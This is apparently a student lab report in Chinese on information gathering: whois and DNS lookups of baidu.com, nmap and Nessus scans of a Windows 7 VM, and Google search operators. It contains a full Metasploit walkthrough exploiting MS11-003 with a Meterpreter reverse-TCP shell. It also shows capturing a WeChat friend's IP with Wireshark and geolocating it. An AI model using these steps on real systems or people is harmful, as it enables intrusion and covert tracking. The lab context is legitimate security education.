网络攻防信息搜集技术实验报告
1.实验内容
- 1.1域名与IP信息搜集分析;
- 1.2社交网络IP地址获取与地理位置定位;
- 1.3靶机环境扫描探测、漏洞评估与攻击路径分析;
- 1.4搜索个人网上足迹与高级搜索技能实践。
2.实验目的
学习如何综合使用各种工具(如搜索引擎、扫描引擎、扫描工具)对目标进行分析与了解。锻炼网络攻防中不可或缺的信息搜集技术
3.实验环境
安装Kali镜像以及安装Win7镜像的2台VMware虚拟机,一台win11的笔记本电脑
4.实验过程与分析
4.1 对baidu.com进行DNS域名查询,获取信息
4.1.1 查询DNS注册人及联系方式
在kali的终端中whois baidu.com,查询该域名的注册信息。
从返回数据中可以了解到:
- 注册人组织:北京百度网讯科技有限公司
- 注册人国家:中国
- 注册域名ID:11181110_DOMAIN_COM-VRSN
- 注册商:MarkMonitor Information Technology (Shanghai) Co., Ltd.
- 注册商IANA ID:3838
- 注册机构:MarkMonitor Inc.
- 注册商滥用投诉电话:+1.2083895740
- 注册商滥用投诉邮箱:abusecomplaints@markmonitor.com
4.1.2查询对应域名的IP地址
使用命令dig baidu.com查询DNS解析信息。由图可知,124.237.177.164和110.242.74.102是百度的两个IP地址。且为实现负载均衡,百度配置了多个地址记录,使得用户访问时会分配到不同的服务器IP。
使用命令nslookup baidu.com查询域名的DNS信息,对上述信息进行验证。在本地DNS服务器的缓存解析到了124.237.177.164和110.242.74.102两个IP地址,查询AI得知这说明百度使用了多IP负载均衡策略。
4.1.3查询IP地址注册信息
使用whois查询124.237.177.164
- IP段:182.61.0.0-182.61.255.255
- 所属机构:北京百度网讯科技有限公司(Beijing Baidu Netcom Science and Technology Co., Ltd.)
- 地理位置:中国北京市海淀区上地十街10号百度大厦,邮编100080
- Abuse联系方式:huxin05@baidu.com
- 最后修改时间:2024-03-11T23:29:48Z
- 管理机构:亚太互联网络信息中心(APNIC)
- 地址:北京市中关村理想大厦12f
- 联系方式:邮箱huxin05@baidu.com(同时为滥用投诉邮箱)
- 管理与技术联系人:ZKY3-AP
- 最后修改时间:2025-10-28T02:23:06Z
- 来源:亚太互联网络信息中心(APNIC)
4.1.4跟踪网络路由
在kali的终端中输入traceroute baidu.com,追踪到数据包从本机到目标主机所经过的路径。但是全是*,询问AI可能是中间路由设备禁用了ICMP/UDP响应,导致无法追踪跳转路径。
使用TCP追踪traceroute -T baidu.com
- 第1跳:192.168.57.2(192.168.57.2) 0.295ms 0.208ms
跳数1;节点IP 192.168.57.2(本地网络的网关);延迟0.295ms和0.208ms;最后的表示某一次请求未收到响应(但前两次成功了,所以网关是通的)。 - 第2跳:110.242.74.102(110.242.74.102) 15.134ms
跳数2;直接到达目标IP 110.242.74.102(百度的服务器节点);延迟15.134ms;同样是某一次请求未收到响应,但有一次成功响应,说明已到达目标。
tracert baidu.com
可以看出百度出于安全策略禁用 ICMP 回显功能,导致中间节点不返回响应,从而显示 “请求超时”。
4.1.5获取IP地址注册位置
使用“UU在线工具”查询IP地址的具体位置,网址为:https://uutool.cn/ip/。对于110.242.74.102,它们的详细信息如图所示。发现地址为河北保定
4.2尝试获取一位好友的IP地址与具体地理位置
4.2.1获取IP地址
在Win主机上终端中输入ipconfig得知主机ip为192.168.3.12,如图所示。
给微信好友打语音电话,使用wireshark抓包,使用命令udp and ip.addr==192.168.3.12筛选IP为Win主机地址,并且传输协议为UDP的数据包。筛选结果如图所示。
可以看出主要是60.29.224.172。使用https://uutool.cn/ip/可以看到微信好友的ip详细信息在中国天津
4.3使用nmap开源软件对靶机环境进行扫描
我选择windows7虚拟机作为靶机,在终端中输入ipconfig,得知IP地址为192.168.57.145
kali虚拟机的终端中输入ifconfig,得知kali的IP地址为192.168.57.133
![image]
4.3.1检查靶机IP地址是否活跃
kali虚拟机的终端中输入命令nmap -sn 192.168.57.145对win7虚拟机进行ping扫描,由图可见反馈Host is up,说明该靶机IP地址处于运行状态,网络可达。
kali虚拟机的终端中输入命令nmap -sS 192.168.57.145进行SYN扫描,查询靶机开放的TCP端口。开放的端口有135、139、445。其中135提供RPC服务,139提供NetBIOS会话服务,445端口提供Microsoft目录服务。
kali虚拟机的终端中输入nmap -sU 192.168.57.145对靶机进行UDP扫描,查询靶机开放的UDP端口。靶机开放的UDP端口有123、137、138、500、1900、4500、5355端口。123提供ntp服务。137端口是NetBIOS名称服务
4.3.3靶机安装的操作系统及版本
kali虚拟机的终端中输入命令nmap -O 192.168.57.145,查询靶机安装的操作系统及版本。该扫描结果显示,系统版本是Microsoft Windows 7 SP0-SP1。与实际情况一致
4.3.4靶机安装的服务
通过输入命令nmap -sV 192.168.57.145,查询靶机安装的服务。
- 135/tcp:支持进程间通信及远程管理
- 139/tcp:局域网共享资源连接服务
- 445/tcp:文件与打印机共享服务
4.4用Nessus开源软件对靶机环境进行扫描
4.4.1下载Nessus
在Kali虚拟机上下载nessus,下载的方式是通过如下网址:https://blog.csdn.net/m0_68472908/article/details/137255414
安装完成后,通过https://localhost:8834打开nessus,选择create new scan->host discovery。
输入任务名称、描述、文件夹与目标主机ip。
开放的端口有135,139,445,49152,49153,49154,49155,49156,49158
4.4.4靶机各个端口上网络服务存在哪些安全漏洞
重新新建一个扫描,选择New scan->Advanced Scan。输入任务名称、描述、文件夹与目标主机ip。
扫描情况如图可见
对扫描得情况分析如下:
- 严重漏洞:
- MS11-030:Windows DNS客户端处理链路本地多播名称解析(LLMNR)查询存在缺陷,攻击者可利用该漏洞以Network Service账户权限远程执行任意代码,影响Windows 2008、7等版本。
- Unsupported Windows OS:远程Windows系统因缺少服务包或不再被微软支持,大概率存在安全漏洞,面临持续的安全风险。
- 高危漏洞:
- MS17-010:Windows SMBv1服务存在多个远程代码执行和信息泄露漏洞,未认证攻击者可通过特制数据包远程执行任意代码或泄露敏感信息,该漏洞被“永恒之蓝”等利用,引发WannaCry等勒索软件大规模传播。
4.4.5如何攻陷靶机环境,以获得系统访问权
我们利用MS11-003的ie浏览器严重远程代码执行漏洞,该漏洞在windows7中存在。漏洞源于IE处理CSS @import规则时的逻辑缺陷,对恶意构造的样式表文件输入验证不足,导致堆栈缓冲区溢出。我们可以通过特制的HTML文件触发漏洞,进而控制受害系统。
查看有无关键补丁,搜索到修复漏洞的关键补丁是KB2482017,
打开控制面板,进入程序与功能中的已安装的更新,查看。发现Win7虚拟机中没有相关补丁的,说明可以攻击。
首先,启动kali数据库
运行命令:service postgresql start
运行命令:service postgresql status
运行命令:msfconsole命令,进入metasploit
然后运行命令:search ms11_003,进行查看
运行命令:use exploit/windows/browser/ms11_003_ie_css_import
输入show options查看需要设置的参数
设置生成的恶意网页的URI为baidu.com
运行命令:set URIPATH baidu.com
为防止服务器端口冲突,设置服务器端口为8989,避开常用端口8080
运行命令:set SRVPORT 8989
设置服务器地址,服务器为kali地址。
运行命令:set SRVHOST 192.168.57.133
设置攻击负载
运行命令:set PAYLOAD windows/meterpreter/reverse_tcp
查看参数设置情况。
运行命令:show options
设置LHOST以绑定Kali的IP地址
运行命令:set LHOST 192.168.57.133
为避免冲突设置LPORT
运行命令:set LPORT 8866
运行命令:exploit
开始进行攻击,生成恶意网页和做好其他准备,只等受害者访问我们构造的恶意网页
在Win7靶机打开IE,
访问http://192.168.57.133:8989/baidu.com模拟受害者误点击网页.
出现如图绿色successfully,表示已成功注入
运行命令:sessions列出所有会话,验证攻击是否成功。
任意进入一个回话,查看攻击者的身份,输入命令sessions 6
输入shell进入CMD.
发现输出有明显乱码,因此输入Chcp 65001解决系统编码格式不一致导致的乱码。
输入screenshot对Win7虚拟机进行截图。
Win7虚拟机截图如下
4.5搜索测试
4.5.1通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。
搜索自己的名字,发现网上有很多信息,但是都不是我,全是重名的人
搜索自己的学号,发现有博客园中的博客,没有其他信息。
搜索自己的手机号,没有发现有关于我的敏感信息,但能够判断出我手机号注册的位置。
搜索自己的身份证号,没有任何敏感信息,但可以分析出我的出生地。
总的来说,我的信息没有泄露到互联网。
4.5.2练习使用Googlehack搜集技能完成搜索
(1)site:指定域名
用于搜索指定网站或域名的资源
site:baidu.com 黑客
(2)inurl:URL中包含指定关键词
常用于寻找后台、敏感路径。
inurl:admin
(3)info:指定域名
查询网站的基础信息。
info:baidu.com
(4)intext:限定关键字
限定关键字必须出现在网页正文内容中。
intext:黑客
(5)intitle:匹配关键字
只匹配网页标题中含关键字的页面。
intitle:树莓派
(5)allintitle:查找标题中同时包含多个关键词的页面
比intitle:更严格,要求网页标题中必须同时出现所有指定的关键字。
allintitle:树莓派
(7)filetype:匹配文件类型
限定搜索指定文件格式的资源。
filetype:pdf 树莓派
(8)related:搜索相似网站
功能:寻找与目标网站内容或功能相似的其他网站,用于扩展信息搜集范围。
related:Github.com
(9)ext:限定搜索特定类型的网页扩展名
与filetype:作用类似,但它侧重于URL中显示的文件扩展名。
(10)*通配符
5.问题及解决
问题一:下载安装Nessus的过程中,在编译插件时显示Nessus没有插件。因此,功能有限,无法编译更无法使用
解决一:先关闭nessus服务,然后更新插件最后开启nessus服务,反复几次之后再通过Kali的浏览器中查看,终于可以运行
问题二:使用traceroute -T baidu.com时,无法正常获得所需的信息,提醒我为不允许的操作
解决二:使用管理员权限之后可以正常运行,获得了所需信息。
6.心得体会
本次实验的主要内容是信息搜集技术,我学习了如何综合使用各种工具(如搜索引擎、扫描引擎、扫描工具)对目标进行分析与了解,通过一系列的尝试与练习,我对信息搜集技术有了进一步的认识,技术水平也有了一定的进步。
本次实验的整体难度并不高,但也遇到了不少问题。比如选择靶机镜像,之前想尝试用网络安全协议课程中的win2016,但是发现扫描端口极其慢,只能再安装win7虚拟机才能顺利完成实验。配置nessus时由于与同学进行了交流,借鉴的是非常完备的博客,所以整体比较顺利,但是还是碰到了无法对插件进行编译的问题,查阅资料后反复编译终于成功编译。同时在Googlehack部分,我发现国内很多浏览器不支持部分比较进阶的语法,通过询问AI和与同学交流解决了这个问题。
总而言之,在本次实验中我尝试了信息搜集的基础技术,并深刻感受到了这项技术的强大与全面,也认识到了自己所掌握的只是冰山一角,要学习的还有很多。我相信通过这次实验,我对网络攻防知识与技术有了进一步的认识,信息搜集技术水平也得到了一定提升。
)
